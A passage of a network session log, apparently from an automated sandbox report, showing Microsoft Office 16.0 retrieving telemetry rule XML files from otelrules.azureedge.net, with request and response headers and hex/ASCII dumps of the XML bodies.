2024-11-15 13:10:20 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	49887	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:20 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:20 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:20 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: b85c485e-e01e-00aa-4976-36ceda000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131020Z-164f84587bfdl84ghC1DFWbbhc00000001kg000000004x6c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:20 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	49888	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:20 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:21 UTC	515	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:21 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: a62daa21-301e-0096-7fca-36e71d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131021Z-164f84587bfpc2cvhC1DFW7gdw000000013000000000c0se x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:21 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	49891	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:21 UTC	192	OUT	GET /rules/rule702500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:21 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:21 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB813B3F" x-ms-request-id: 99e874a7-501e-00a0-6b09-379d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131021Z-16547b76f7fd4rc5hC1DFWkzhw00000001p0000000007hfg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:21 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	49889	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:21 UTC	192	OUT	GET /rules/rule703400v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:21 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:21 GMT Content-Type: text/xml Content-Length: 1388 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDBD9126E" x-ms-request-id: 9bdc8c39-b01e-003d-1ed2-2cd32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131021Z-16547b76f7fwvr5dhC1DFW2c940000000mzg00000000ey1p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:21 UTC	1388	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	49890	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:21 UTC	192	OUT	GET /rules/rule702501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:21 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:21 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT ETag: "0x8DC582BE7C66E85" x-ms-request-id: 9564d138-601e-0084-5287-366b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131021Z-164f84587bf28gjzhC1DFW35kg000000017000000000avnf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:21 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	49892	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:21 UTC	192	OUT	GET /rules/rule700501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:21 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:21 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT ETag: "0x8DC582BE89A8F82" x-ms-request-id: 09d23618-001e-000b-0deb-2b15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131021Z-16547b76f7ftdm8dhC1DFWs13g0000000n1g00000000fm7q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:21 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	49893	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:21 UTC	192	OUT	GET /rules/rule700500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:22 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:21 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE51CE7B3" x-ms-request-id: 5d2bddd1-201e-006e-8040-36bbe3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131021Z-16547b76f7fx6rhxhC1DFW76kg0000000n1000000000guad x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:22 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	49894	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:22 UTC	192	OUT	GET /rules/rule702551v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:22 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:22 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCE9703A" x-ms-request-id: cd727bf0-801e-007b-329c-36e7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131022Z-16547b76f7fgvq8chC1DFWhd2w00000001vg00000000bxu6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:22 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	49895	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:22 UTC	192	OUT	GET /rules/rule702550v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:22 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:22 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE584C214" x-ms-request-id: fe042a41-f01e-0003-03af-364453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131022Z-16547b76f7fknvdnhC1DFWxnys0000000n8g0000000051q9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:22 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	49896	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:22 UTC	192	OUT	GET /rules/rule701351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:22 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:22 GMT Content-Type: text/xml Content-Length: 1407 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE687B46A" x-ms-request-id: dbae507e-301e-000c-7008-36323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131022Z-1866b5c5fbb55pxzhC1DFW1aps00000001ag000000008u76 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:22 UTC	1407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	49897	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:22 UTC	192	OUT	GET /rules/rule701350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:22 UTC	515	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:22 GMT Content-Type: text/xml Content-Length: 1370 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE62E0AB" x-ms-request-id: bdd76a06-901e-002a-1ef8-367a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131022Z-1866b5c5fbbvz6qbhC1DFWsyms00000000mg000000003c5h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-15 13:10:22 UTC	1370	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	49898	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
